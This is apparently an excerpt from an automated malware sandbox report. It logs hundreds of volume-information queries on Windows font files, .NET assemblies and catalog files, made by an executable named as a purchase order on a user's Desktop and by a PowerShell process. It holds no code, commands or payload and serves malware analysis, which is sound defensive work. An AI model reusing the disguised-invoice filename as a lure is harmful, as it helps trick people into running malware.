                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
